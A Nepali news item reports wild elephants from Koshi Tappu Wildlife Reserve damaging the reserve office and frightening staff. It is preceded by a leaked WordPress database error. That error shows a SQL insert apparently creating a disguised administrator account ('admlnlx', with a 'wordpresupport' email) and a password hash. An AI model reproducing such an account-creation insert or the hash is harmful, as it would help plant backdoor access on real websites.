WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBoB35EKhA9PT5gOkw5MnJ6xYvdnR60', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 03:38:05', '', 'admlnlx', 'admlnlx')
इनरुवा,पुस १२ –
कोसी टप्पु वन्यजन्तु आरक्षबाट दैनिक रुपमा हात्ती निस्कने गरेकाले आरक्षको कार्यालयमा कार्यरत कर्मचारी त्रसित भएका छन् ।
दैनिक रुपमा आरक्षको जङ्गल क्षेत्रबाट दिउँसो र राति जङ्गली हात्ती आएर कार्यालय परिसरमा बितन्डा मचाउने छन् । सोमबार दिउँसो र राति कोसी टप्पु वन्यजन्तु आरक्षबाट निस्केको जङ्गली हात्तीले आतङ्क मच्चाउन थालेपछि आफूहरु त्रसित भएको आरक्षका संरक्षण अधिकृत श्यामप्रसाद साहले जानकारी दिनुभयो ।
सोमबार राति मात्र आरक्षको जङ्गल क्षेत्रबाट निस्केका जङ्गली हात्तीले आरक्षको पर्खाल र भान्सा कोठामा तोडफोड गरेको थियो । जङ्गली हात्तीका कारण यहाँ आउने जनसमुदायसमेत त्रसित रहेकाले यस क्षेत्रमा वनभोज लगायत कार्यक्रम नगर्न उहाँले आग्रह गर्नुभयो । – रासस